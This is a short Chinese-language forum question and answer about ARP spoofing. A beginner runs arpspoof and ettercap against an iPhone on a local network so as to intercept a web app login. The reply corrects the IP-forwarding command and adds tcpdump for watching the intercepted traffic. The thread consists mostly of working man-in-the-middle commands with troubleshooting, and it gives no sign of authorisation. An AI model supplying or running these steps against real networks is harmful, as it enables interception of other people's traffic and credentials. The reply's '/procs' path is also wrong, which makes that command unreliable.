首先,我是所有这一切的新手,所以任何支持或帮助都会受到赞赏。
每当我尝试使用arp毒药时,当我尝试登录iphone上的Web应用程序时,它会卡在加载屏幕上,不会进展,然后最终会断开连接。
我按照以下顺序在3个不同的终端上使用以下代码:
echo > 1 /procs/sys/net/ipv4/ip_forward
arpspoof -i eth0 -t xxx.xxx.0.12 -r xxx.xxx.0.1
arpspoof -i eth0 -t xxx.xxx.0.1 -r xxx.xxx.0.12
另外,我尝试过使用ettercap,结果也是如此。当我尝试登录iphone上的Web应用程序时,它会卡在加载屏幕上并最终导致连接断开。
一直在寻找答案但却找不到任何具体和有帮助的东西。任何帮助都会非常感激!
谢谢
答案 0 :(得分:0)
好吧,如果这行得通的话,那会很恐怖。
尝试
echo 1 > /procs/sys/net/ipv4/ip_forward
或
sysctl net.ipv4.ip_forward=1
代替
echo > 1 /procs/sys/net/ipv4/ip_forward
也可以运行
tcpdump -i eth0
在进行欺骗时。 这样,您可以检查/查看通过Kali机器的流量。